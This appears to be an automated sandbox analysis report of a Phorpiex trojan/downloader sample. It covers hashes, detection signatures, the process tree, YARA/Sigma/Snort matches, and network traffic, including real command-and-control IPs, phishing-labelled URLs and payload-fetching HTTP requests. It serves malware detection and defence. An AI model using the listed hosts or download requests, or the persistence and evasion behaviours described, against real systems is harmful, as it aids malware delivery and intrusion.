

Windows Analysis Report
SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe

Overview

General Information

Sample name: SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe
Analysis ID: 1438295
MD5: 0a547347b0b9af0290b263dfa8d71ebe
SHA1: 5ff176bfe5e0255a68c8e3d132afbff795a1fc1d
SHA256: b00aa26d9d7889613c7552ce6e17b0264788e24c6166edcf68c47f209ca767f8
Tags: exe, Phorpiex

Detection

Phorpiex
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Phorpiex
Changes security center settings (notifications, updates, antivirus, firewall)
Changes the view of files in windows explorer (hidden files and folders)
Contains functionality to check if Internet connection is working
Contains functionality to detect sleep reduction / modifications
Contains functionality to determine the online IP of the system
Drops PE files to the user root directory
Drops executables to the windows directory (C:\Windows) and starts them
Found evasive API chain (may stop execution after checking mutex)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Machine Learning detection for sample
Abnormal high CPU Usage
Connects to several IPs in different countries
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found evaded block containing many API calls
Found evasive API chain (may stop execution after accessing registry keys)
Found large amount of non-executed APIs
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe (PID: 6832 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe" MD5: 0A547347B0B9AF0290B263DFA8D71EBE)
    • sysbrapsvc.exe (PID: 5588 cmdline: C:\Windows\sysbrapsvc.exe MD5: 0A547347B0B9AF0290B263DFA8D71EBE)
      • 3193211493.exe (PID: 3640 cmdline: C:\Users\user\AppData\Local\Temp\3193211493.exe MD5: 0A547347B0B9AF0290B263DFA8D71EBE)
      • 1146722911.exe (PID: 2060 cmdline: C:\Users\user\AppData\Local\Temp\1146722911.exe MD5: D085F41FE497A63DC2A4882B485A2CAF)
        • 2303012543.exe (PID: 3324 cmdline: C:\Users\user\AppData\Local\Temp\2303012543.exe MD5: 9B8A3FB66B93C24C52E9C68633B00F37)
        • 2711236308.exe (PID: 4936 cmdline: C:\Users\user\AppData\Local\Temp\2711236308.exe MD5: 9B8A3FB66B93C24C52E9C68633B00F37)
        • 1245832676.exe (PID: 1464 cmdline: C:\Users\user\AppData\Local\Temp\1245832676.exe MD5: 9B8A3FB66B93C24C52E9C68633B00F37)
      • 2006625995.exe (PID: 3628 cmdline: C:\Users\user\AppData\Local\Temp\2006625995.exe MD5: 802C60DB52BD6C4DB699A74F63A00D8D)
      • 330125677.exe (PID: 2068 cmdline: C:\Users\user\AppData\Local\Temp\330125677.exe MD5: 11D2F27FB4F0C424AB696573E79DB18C)
      • 300129380.exe (PID: 4820 cmdline: C:\Users\user\AppData\Local\Temp\300129380.exe MD5: CAFD277C4132F5D0F202E7EA07A27D5C)
  • sysbrapsvc.exe (PID: 768 cmdline: "C:\Windows\sysbrapsvc.exe" MD5: 0A547347B0B9AF0290B263DFA8D71EBE)
  • winploravr.exe (PID: 3020 cmdline: "C:\Users\user\winploravr.exe" MD5: D085F41FE497A63DC2A4882B485A2CAF)
  • winploravr.exe (PID: 6368 cmdline: "C:\Windows\winploravr.exe" MD5: D085F41FE497A63DC2A4882B485A2CAF)
  • winploravr.exe (PID: 2796 cmdline: "C:\Users\user\winploravr.exe" MD5: D085F41FE497A63DC2A4882B485A2CAF)
  • cleanup
No configs have been found
Yara matches (sample):
Source | Rule | Description | Author
SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe | JoeSecurity_Phorpiex_4 | Yara detected Phorpiex | Joe Security

Yara matches (dropped files):
Source | Rule | Description | Author
C:\Windows\sysbrapsvc.exe | JoeSecurity_Phorpiex_4 | Yara detected Phorpiex | Joe Security
C:\Users\user\AppData\Local\Temp\3193211493.exe | JoeSecurity_Phorpiex_4 | Yara detected Phorpiex | Joe Security

Yara matches (memory dumps; additional entries are collapsed in the original report):
Source | Rule | Description | Author
00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp | JoeSecurity_Phorpiex_4 | Yara detected Phorpiex | Joe Security
00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmp | JoeSecurity_Phorpiex_4 | Yara detected Phorpiex | Joe Security
00000000.00000000.1395571963.0000000000410000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_Phorpiex_4 | Yara detected Phorpiex | Joe Security
00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmp | JoeSecurity_Phorpiex_4 | Yara detected Phorpiex | Joe Security
00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_Phorpiex_4 | Yara detected Phorpiex | Joe Security

Yara matches (unpacked PEs; additional entries are collapsed in the original report):
Source | Rule | Description | Author
5.0.3193211493.exe.400000.0.unpack | JoeSecurity_Phorpiex_4 | Yara detected Phorpiex | Joe Security
2.2.sysbrapsvc.exe.400000.0.unpack | JoeSecurity_Phorpiex_4 | Yara detected Phorpiex | Joe Security
2.0.sysbrapsvc.exe.400000.0.unpack | JoeSecurity_Phorpiex_4 | Yara detected Phorpiex | Joe Security
0.2.SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe.400000.0.unpack | JoeSecurity_Phorpiex_4 | Yara detected Phorpiex | Joe Security
5.2.3193211493.exe.400000.0.unpack | JoeSecurity_Phorpiex_4 | Yara detected Phorpiex | Joe Security
Sigma rule matches:
Sigma: CurrentVersion Autorun Keys Modification | Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\winploravr.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\1146722911.exe, ProcessId: 2060, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Service
Sigma: Suspicious Outbound SMTP Connections | Source: Network Connection | Author: frack113 | Data: DestinationIp: 67.195.228.94, DestinationIsIpv6: false, DestinationPort: 25, EventID: 3, Image: C:\Users\user\AppData\Local\Temp\2006625995.exe, Initiated: true, ProcessId: 3628, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49720
Sigma: Wow6432Node CurrentVersion Autorun Keys Modification | Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Windows\sysbrapsvc.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe, ProcessId: 6832, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings
Snort IDS alerts:
Timestamp | SID | Source Port | Destination Port | Protocol | Classtype
05/08/24-15:22:40.436270 | 2044077 | 53100 | 40500 | UDP | A Network Trojan was detected
05/08/24-15:22:45.471815 | 2837677 | 80 | 49713 | TCP | A Network Trojan was detected
05/08/24-15:22:46.732432 | 2837677 | 80 | 49715 | TCP | A Network Trojan was detected
05/08/24-15:22:49.024024 | 2837677 | 80 | 49717 | TCP | A Network Trojan was detected
05/08/24-15:22:48.428846 | 2837677 | 80 | 49716 | TCP | A Network Trojan was detected
05/08/24-15:22:30.416735 | 2044077 | 53100 | 40500 | UDP | A Network Trojan was detected
05/08/24-15:22:35.420978 | 2044077 | 53100 | 40500 | UDP | A Network Trojan was detected
05/08/24-15:22:25.401623 | 2044077 | 53100 | 40500 | UDP | A Network Trojan was detected



                            AV Detection

Source: SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe | Avira: detected
Source: http://twizt.net/ALLSTATAo | Avira URL Cloud: Label: phishing
Source: http://185.215.113.66/5P | Avira URL Cloud: Label: malware
Source: http://twizt.net/ | Avira URL Cloud: Label: phishing
Source: http://twizt.net/ALLSTATAopen%temp%%s | Avira URL Cloud: Label: phishing
Source: http://185.215.113.66/2H | Avira URL Cloud: Label: malware
Source: http://185.215.113.66/2O | Avira URL Cloud: Label: malware
Source: http://185.215.113.66/6 | Avira URL Cloud: Label: malware
Source: http://twizt.net/ALLSTATAnt | Avira URL Cloud: Label: phishing
Source: http://185.215.113.66/3T | Avira URL Cloud: Label: malware
Source: http://185.215.113.66/1A | Avira URL Cloud: Label: malware
Source: http://185.215.113.66/der | Avira URL Cloud: Label: malware
Source: http://193.233.132.177/_3 | Avira URL Cloud: Label: malware
Source: http://twizt.net/ALLSTATAWaIG2 | Avira URL Cloud: Label: phishing
Source: http://185.215.113.66/3KKC: | Avira URL Cloud: Label: malware
Source: http://twizt.net/ALLSTATA | Avira URL Cloud: Label: phishing
Source: http://twizt.net/ALLSTATA7a | Avira URL Cloud: Label: phishing
Source: C:\Windows\sysbrapsvc.exe | Avira: detection malicious, Label: HEUR/AGEN.1360619
Source: C:\Users\user\AppData\Local\Temp\3193211493.exe | Avira: detection malicious, Label: HEUR/AGEN.1360619
Source: C:\Users\user\AppData\Local\Temp\1146722911.exe | ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\1245832676.exe | ReversingLabs: Detection: 29%
Source: C:\Users\user\AppData\Local\Temp\2303012543.exe | ReversingLabs: Detection: 29%
Source: C:\Users\user\AppData\Local\Temp\2711236308.exe | ReversingLabs: Detection: 29%
Source: C:\Users\user\AppData\Local\Temp\300129380.exe | ReversingLabs: Detection: 37%
Source: C:\Users\user\AppData\Local\Temp\3193211493.exe | ReversingLabs: Detection: 78%
Source: C:\Users\user\AppData\Local\Temp\330125677.exe | ReversingLabs: Detection: 62%
Source: C:\Users\user\winploravr.exe | ReversingLabs: Detection: 95%
Source: C:\Windows\sysbrapsvc.exe | ReversingLabs: Detection: 78%
Source: C:\Windows\winploravr.exe | ReversingLabs: Detection: 95%
Source: SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe | ReversingLabs: Detection: 78%
Source: C:\Users\user\AppData\Local\Temp\330125677.exe | Joe Sandbox ML: detected
Source: C:\Users\user\winploravr.exe | Joe Sandbox ML: detected
Source: C:\Windows\sysbrapsvc.exe | Joe Sandbox ML: detected
Source: C:\Users\user\winploravr.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\2006625995.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\3193211493.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1146722911.exe | Joe Sandbox ML: detected
Source: SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe | Code function: 0_2_0040C330 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,0_2_0040C330
Source: C:\Windows\sysbrapsvc.exe | Code function: 2_2_0040C330 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,2_2_0040C330
Source: C:\Windows\sysbrapsvc.exe | Code function: 4_2_0040C330 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,4_2_0040C330
Source: C:\Users\user\AppData\Local\Temp\3193211493.exe | Code function: 5_2_0040C330 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,5_2_0040C330
Source: C:\Users\user\AppData\Local\Temp\1146722911.exe | Code function: 7_2_00DB1000 CryptAcquireContextW,7_2_00DB1000
Source: C:\Users\user\AppData\Local\Temp\1146722911.exe | Code function: 7_2_00DB1100 CryptImportKey,CreateFileW,GetFileSize,CreateFileMappingA,MapViewOfFile,CryptCreateHash,GetProcessHeap,RtlAllocateHeap,CryptHashData,CryptVerifySignatureA,memcpy,GetProcessHeap,HeapFree,UnmapViewOfFile,FindCloseChangeNotification,SetFilePointer,SetEndOfFile,CloseHandle,CryptDestroyKey,7_2_00DB1100
Source: C:\Users\user\AppData\Local\Temp\1146722911.exe | Code function: 7_2_00DB1020 memcpy,memcpy,CryptImportKey,CryptEncrypt,CryptDestroyKey,7_2_00DB1020
Source: C:\Users\user\winploravr.exe | Code function: 9_2_002A1020 memcpy,memcpy,CryptImportKey,CryptEncrypt,CryptDestroyKey,9_2_002A1020
Source: C:\Users\user\winploravr.exe | Code function: 9_2_002A1000 CryptAcquireContextW,9_2_002A1000
Source: C:\Users\user\winploravr.exe | Code function: 9_2_002A1100 CryptImportKey,CreateFileW,GetFileSize,CreateFileMappingA,MapViewOfFile,CryptCreateHash,GetProcessHeap,HeapAlloc,CryptHashData,CryptVerifySignatureA,memcpy,GetProcessHeap,HeapFree,UnmapViewOfFile,CloseHandle,SetFilePointer,SetEndOfFile,CloseHandle,CryptDestroyKey,9_2_002A1100
Source: C:\Windows\winploravr.exe | Code function: 14_2_000F1000 CryptAcquireContextW,14_2_000F1000
Source: C:\Windows\winploravr.exe | Code function: 14_2_000F1100 CryptImportKey,CreateFileW,GetFileSize,CreateFileMappingA,MapViewOfFile,CryptCreateHash,GetProcessHeap,HeapAlloc,CryptHashData,CryptVerifySignatureA,memcpy,GetProcessHeap,HeapFree,UnmapViewOfFile,CloseHandle,SetFilePointer,SetEndOfFile,CloseHandle,CryptDestroyKey,14_2_000F1100
Source: C:\Windows\winploravr.exe | Code function: 14_2_000F1020 memcpy,memcpy,CryptImportKey,CryptEncrypt,CryptDestroyKey,14_2_000F1020

                            Phishing

Source: Yara match | File source: SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe, type: SAMPLE
Source: Yara match | File source: 5.0.3193211493.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.sysbrapsvc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.sysbrapsvc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.3193211493.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.sysbrapsvc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.0.sysbrapsvc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.1395571963.0000000000410000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.1558944525.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.1416106928.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000000.1544428131.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.1665949097.0000000004781000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1416145697.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe PID: 6832, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: sysbrapsvc.exe PID: 5588, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: sysbrapsvc.exe PID: 768, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: 3193211493.exe PID: 3640, type: MEMORYSTR
Source: Yara match | File source: C:\Windows\sysbrapsvc.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\3193211493.exe, type: DROPPED
Source: SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\AppData\Local\Temp\1146722911.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9625_none_508ef7e4bcbbe589\MSVCR90.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe | Code function: 0_2_00406650 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,0_2_00406650
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe | Code function: 0_2_00406510 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406510
Source: C:\Windows\sysbrapsvc.exe | Code function: 2_2_00406650 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,2_2_00406650
Source: C:\Windows\sysbrapsvc.exe | Code function: 2_2_00406510 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,2_2_00406510
Source: C:\Windows\sysbrapsvc.exe | Code function: 4_2_00406650 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,4_2_00406650
Source: C:\Windows\sysbrapsvc.exe | Code function: 4_2_00406510 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,4_2_00406510
Source: C:\Users\user\AppData\Local\Temp\3193211493.exe | Code function: 5_2_00406650 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,5_2_00406650
Source: C:\Users\user\AppData\Local\Temp\3193211493.exe | Code function: 5_2_00406510 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,5_2_00406510

                            Networking

                            Source: TrafficSnort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.8:53100 -> 10.102.10.21:40500
                            Source: TrafficSnort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.8:53100 -> 189.222.182.86:40500
                            Source: TrafficSnort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.8:53100 -> 2.133.220.58:40500
                            Source: TrafficSnort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.8:53100 -> 100.82.121.252:40500
                            Source: TrafficSnort IDS: 2837677 ETPRO TROJAN Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature) 185.215.113.66:80 -> 192.168.2.8:49713
                            Source: TrafficSnort IDS: 2837677 ETPRO TROJAN Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature) 185.215.113.66:80 -> 192.168.2.8:49715
                            Source: TrafficSnort IDS: 2837677 ETPRO TROJAN Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature) 185.215.113.66:80 -> 192.168.2.8:49716
                            Source: TrafficSnort IDS: 2837677 ETPRO TROJAN Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature) 185.215.113.66:80 -> 192.168.2.8:49717
                            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exeCode function: 0_2_0040AF30 htons,socket,connect,getsockname, www.update.microsoft.com0_2_0040AF30
                            Source: C:\Windows\sysbrapsvc.exeCode function: 2_2_0040AF30 htons,socket,connect,getsockname, www.update.microsoft.com2_2_0040AF30
                            Source: C:\Windows\sysbrapsvc.exeCode function: 4_2_0040AF30 htons,socket,connect,getsockname, www.update.microsoft.com4_2_0040AF30
                            Source: C:\Users\user\AppData\Local\Temp\3193211493.exeCode function: 5_2_0040AF30 htons,socket,connect,getsockname, www.update.microsoft.com5_2_0040AF30
                            Source: C:\Users\user\AppData\Local\Temp\2006625995.exeCode function: 10_2_00D717D0 InternetOpenA,InternetOpenUrlA,InternetReadFile,wsprintfA,wsprintfA,InternetCloseHandle,wsprintfA,InternetCloseHandle, http://icanhazip.com/10_2_00D717D0
                            Source: unknownNetwork traffic detected: IP country count 18
                            Source: global trafficTCP traffic: 192.168.2.8:49709 -> 37.151.73.50:40500
                            Source: global trafficTCP traffic: 192.168.2.8:49714 -> 93.117.37.145:40500
                            Source: global trafficTCP traffic: 192.168.2.8:49725 -> 212.154.184.158:40500
                            Source: global trafficTCP traffic: 192.168.2.8:49736 -> 82.194.11.2:40500
                            Source: global trafficTCP traffic: 192.168.2.8:49746 -> 77.240.41.3:40500
                            Source: global trafficTCP traffic: 192.168.2.8:49773 -> 201.171.26.123:40500
                            Source: global trafficTCP traffic: 192.168.2.8:49783 -> 111.9.3.39:40500
                            Source: global trafficTCP traffic: 192.168.2.8:49798 -> 88.204.241.110:40500
                            Source: global trafficTCP traffic: 192.168.2.8:49810 -> 187.250.131.80:40500
                            Source: global trafficUDP traffic: 192.168.2.8:53100 -> 189.222.182.86:40500
                            Source: global trafficUDP traffic: 192.168.2.8:53100 -> 2.133.220.58:40500
                            Source: global trafficUDP traffic: 192.168.2.8:53100 -> 100.82.121.252:40500
                            Source: global trafficUDP traffic: 192.168.2.8:53100 -> 92.124.152.236:40500
                            Source: global trafficUDP traffic: 192.168.2.8:53100 -> 93.123.145.179:40500
                            Source: global trafficUDP traffic: 192.168.2.8:53100 -> 89.236.218.241:40500
                            Source: global trafficUDP traffic: 192.168.2.8:53100 -> 89.218.238.106:40500
                            Source: global trafficUDP traffic: 192.168.2.8:53100 -> 85.204.86.26:40500
                            Source: global trafficUDP traffic: 192.168.2.8:53100 -> 89.236.219.106:40500
                            Source: global trafficUDP traffic: 192.168.2.8:53100 -> 37.120.247.6:40500
                            Source: global trafficUDP traffic: 192.168.2.8:53100 -> 92.47.124.54:40500
                            Source: global trafficUDP traffic: 192.168.2.8:53100 -> 102.130.192.212:40500
                            Source: global trafficUDP traffic: 192.168.2.8:53100 -> 91.92.206.184:40500
                            Source: global trafficUDP traffic: 192.168.2.8:53100 -> 109.168.235.213:40500
                            Source: global trafficUDP traffic: 192.168.2.8:53100 -> 187.235.148.47:40500
                            Source: Joe Sandbox View | ASN Name: KAZTELECOM-ASKZ KAZTELECOM-ASKZ
                            Source: global traffic | TCP traffic: 192.168.2.8:49720 -> 67.195.228.94:25
                            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe | Code function: 0_2_00401C50 WSARecv,WSARecv,WSAGetLastError,Sleep,WSARecv, | 0_2_00401C50
                            Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /_2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /_3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /_1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /_2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /_3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
